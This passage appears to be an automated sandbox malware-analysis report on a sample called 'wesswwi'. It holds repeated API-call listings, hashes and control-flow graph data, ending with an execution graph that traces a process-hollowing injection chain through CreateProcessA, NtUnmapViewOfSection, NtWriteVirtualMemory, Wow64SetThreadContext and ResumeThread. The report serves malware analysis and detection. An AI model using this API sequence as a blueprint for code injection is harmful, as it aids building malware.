                                                                                                                                                                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1951062573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_wesswwi.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8b4368bb53e1649655da800b8e3771367f61da053ffbe47dde7c34dc5595736a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ddfd821467dba8d9e3be05996510f596060048204c77d2b9bdf6330f9e046059
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8b4368bb53e1649655da800b8e3771367f61da053ffbe47dde7c34dc5595736a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C11E571708104E7D6209A449B4EF6B3724AB50B00F308077E5077A1C0D9FD9A07BBAF
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 343 4029c5-402a0b call 40120e 354 402a0f-402a1d LdrLoadDll 343->354 355 402a26-402a71 call 40120e 354->355 356 402a1f 354->356 356->355
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1951062573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_wesswwi.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 630f67e63f4c9d6cadc1f4ef28869250e9dd95ac73f78134dda1cef590dfe083
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: eda82e36109819710fc28ef01b941f30aa1b457bd77d6c907d6690057fca41fa
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 630f67e63f4c9d6cadc1f4ef28869250e9dd95ac73f78134dda1cef590dfe083
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C01C471708205E7DA60DA949A4EB6B7710AB51B10F308077E5037A1C4DAFD9A07FB6B
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 368 4029d1-4029d3 370 4029d6-402a0b call 40120e 368->370 371 4029ca-4029cf 368->371 380 402a0f-402a1d LdrLoadDll 370->380 371->370 381 402a26-402a71 call 40120e 380->381 382 402a1f 380->382 382->381
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1951062573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_wesswwi.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8aebd7c2dfb35844096bdf04bcf18f9291abc38b44631a4f8f553a04b448b611
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 27f311fed6bd4bb195386d6e886048742e5b6b48a655c0a394e70793ed6bf28f
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8aebd7c2dfb35844096bdf04bcf18f9291abc38b44631a4f8f553a04b448b611
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E0018071708105E7DA609A449B4EB6B7324BB50B10F308477E5077A1C4DAFD9A07BB6F
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 394 4029d5-402a0b call 40120e 402 402a0f-402a1d LdrLoadDll 394->402 403 402a26-402a71 call 40120e 402->403 404 402a1f 402->404 404->403
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1951062573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_wesswwi.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 14f9d75437b26c4e33ab762a249f6d4a6897a4cf10a17b4738070ea496484bd2
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6c082c2f6db60d75b034223dafbed04b71575a1e0537fab93527f59567f6cb96
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 14f9d75437b26c4e33ab762a249f6d4a6897a4cf10a17b4738070ea496484bd2
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB01B531708105E7DB60DA409A4DF5F7720BB50B10F208577E5077A1C4DAF99A17EB9B
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 416 4029e2-402a0b call 40120e 423 402a0f-402a1d LdrLoadDll 416->423 424 402a26-402a71 call 40120e 423->424 425 402a1f 423->425 425->424
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1951062573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_wesswwi.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b2d371f82e3e545a267ab12f2e2f0a58ec4b54f775fd64736b106f9591d7a7c3
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: daf8977218c418413866257df5c9087131837fd98e0c4230724de407841e0162
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2d371f82e3e545a267ab12f2e2f0a58ec4b54f775fd64736b106f9591d7a7c3
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3801DF31708104E7DB209A848A4DB5E7320AB40B10F208577E507BA1C0DAF9AA07AFAB
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 437 4029e9-402a0b call 40120e 442 402a0f-402a1d LdrLoadDll 437->442 443 402a26-402a71 call 40120e 442->443 444 402a1f 442->444 444->443
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1951062573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_wesswwi.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9850a57f899f03cbeedeed8d531e786c982b6ed5f0a372be87f463e87495e5bd
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5524fd7572365f35614fa46947343296b9db081daee3b4d0816b59f029c0b045
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9850a57f899f03cbeedeed8d531e786c982b6ed5f0a372be87f463e87495e5bd
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2101A731704104E7D7209A448A4EB5E7720AB40704F208477E5067A1C4DAB9EA07AB6B
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 456 4029f9-402a1d call 40120e LdrLoadDll 463 402a26-402a71 call 40120e 456->463 464 402a1f 456->464 464->463
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1951062573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_wesswwi.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 83fdb88ab79b739a001a2e8c05ea2e4136fbf27434a3016a2f3de2c8c28590ed
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2a527b723104a8d4642483acce18f9de5ed6d5a74c4e47f32731208c7d716ef4
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83fdb88ab79b739a001a2e8c05ea2e4136fbf27434a3016a2f3de2c8c28590ed
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1801A231708104E7DB209A849A4DF9F7720AB40B14F208477E5027A1C0DAF9AA07AFAB
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388), ref: 004019B4
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1951062573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_wesswwi.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1885482327-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b8285f967374eae4a3c51efe3ce59b098afe428af0dcb557450618fb68c9c18d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1276e484f00ba66cbffb4616bb4d5d076efec51046982770477825c9afbd6400
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b8285f967374eae4a3c51efe3ce59b098afe428af0dcb557450618fb68c9c18d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F01D2B6708205FADB005A949C62EBB3618AB41755F300637BA13B80F1C57D8513FA6F
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388), ref: 004019B4
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1951062573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_wesswwi.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1885482327-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9a4c6db62cce5b151e284cc19e63a433146ff3755d8681b35f1a2b6972971a8e
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0230620869f43b82b90ed4dddf49477c9f5c6c73dade890abd4ec4b7d4a8195a
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a4c6db62cce5b151e284cc19e63a433146ff3755d8681b35f1a2b6972971a8e
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4801BCB6308205FADB005A949C62FBA3219AB84751F30053BB613BC0F1C53D8513FA2F
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388), ref: 004019B4
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1951062573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_wesswwi.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1885482327-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 25088a1f844088f741a859eeb607afc94706ffd20a91742bc3d9f24c23efa0b5
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9a4b4ffd5ca22a672d673467c452b15ea5c40039b4ea8ded510267d200494456
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 25088a1f844088f741a859eeb607afc94706ffd20a91742bc3d9f24c23efa0b5
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A01B1B6308205FADB115A949C61A7A3319AB45711F30053BB613B80F2C53D8512FA1F
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388), ref: 004019B4
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1951062573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_wesswwi.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1885482327-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f146987f8c0bf49c3ef7592727f3e0a51ae856d021a330616d03f7304a9c3b71
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5a2bb716a64f0a1f1a6e426f0b200f3e6862a670896c4db1e76ea4af0659c5ba
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f146987f8c0bf49c3ef7592727f3e0a51ae856d021a330616d03f7304a9c3b71
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3101DFB2308205FADB005AD49C62F7A3219AB85715F30453BB623B80F1C63D8512FB2F
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00A6E9D6
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1951442963.0000000000A68000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A68000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_a68000_wesswwi.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ef1b56d88091b0234aa1eaebda6b6ab8bc6fafea249bfe40e19108c162d18d7a
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A113C79A00208EFDB01DF98CA85E98BFF5AF08351F058094F9489B362D371EA50EF90
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388), ref: 004019B4
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1951062573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_wesswwi.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1885482327-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a8f77c5b0aafc3a83b6e9a89fc0125d54fce9978fbcf9d902b8238b221feffd7
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 689da8ed0bf63c85a60a16fbbe407e4b0918199af58fa2149c0a58fdfe32668e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8f77c5b0aafc3a83b6e9a89fc0125d54fce9978fbcf9d902b8238b221feffd7
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E0181B6308105FADB115AD49D52FBA3719AB45751F30453BB613B80F2C53D8512FB2B
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388), ref: 004019B4
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1951062573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_wesswwi.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1885482327-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 994369af4d0fa0c447a21c659804c9e18bb6abd6db9e85dcf8f049b878b9c4ba
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9477092311c163758adf26378a137d016a4cc75b4861da4fd192d9fcf75081b0
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 994369af4d0fa0c447a21c659804c9e18bb6abd6db9e85dcf8f049b878b9c4ba
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25016D72304105FADB119AD09C52EAA3729AB48355F30457BB613BD0F2C63D8552EB2B
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                                                                  Execution Coverage:42.6%
                                                                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:86.4%
                                                                                                                                                                                                                                                                                                                                  Signature Coverage:34.1%
                                                                                                                                                                                                                                                                                                                                  Total number of Nodes:44
                                                                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:8
                                                                                                                                                                                                                                                                                                                                  execution_graph 480 403e95 483 4080dc 480->483 482 403e9a 482->482 484 408101 483->484 485 40810e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 483->485 484->485 486 408105 484->486 485->486 486->482 431 2890000 434 2890630 431->434 433 2890005 435 289064c 434->435 437 2891577 435->437 440 28905b0 437->440 443 28905dc 440->443 441 289061e 442 28905e2 GetFileAttributesA 442->443 443->441 443->442 445 2890420 443->445 446 28904f3 445->446 447 28904fa 446->447 448 28904ff CreateWindowExA 446->448 447->443 448->447 449 2890540 PostMessageA 448->449 450 289055f 449->450 450->447 452 2890110 VirtualAlloc GetModuleFileNameA 450->452 453 289017d CreateProcessA 452->453 454 2890414 452->454 453->454 456 289025f VirtualFree VirtualAlloc Wow64GetThreadContext 453->456 454->450 456->454 457 28902a9 ReadProcessMemory 456->457 458 28902e5 VirtualAllocEx NtWriteVirtualMemory 457->458 459 28902d5 NtUnmapViewOfSection 457->459 460 289033b 458->460 459->458 461 289039d WriteProcessMemory Wow64SetThreadContext ResumeThread 460->461 462 2890350 NtWriteVirtualMemory 460->462 463 28903fb ExitProcess 461->463 462->460 465 26ce026 466 26ce035 465->466 469 26ce7c6 466->469 470 26ce7e1 469->470 471 26ce7ea CreateToolhelp32Snapshot 470->471 472 26ce806 Module32First 470->472 471->470 471->472 473 26ce03e 472->473 474 26ce815 472->474 476 26ce485 474->476 477 26ce4b0 476->477 478 26ce4f9 477->478 479 26ce4c1 VirtualAlloc 477->479 478->478 479->478

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 02890156
                                                                                                                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0289016C
                                                                                                                                                                                                                                                                                                                                  • CreateProcessA.KERNELBASE(?,00000000), ref: 02890255
                                                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02890270
                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02890283
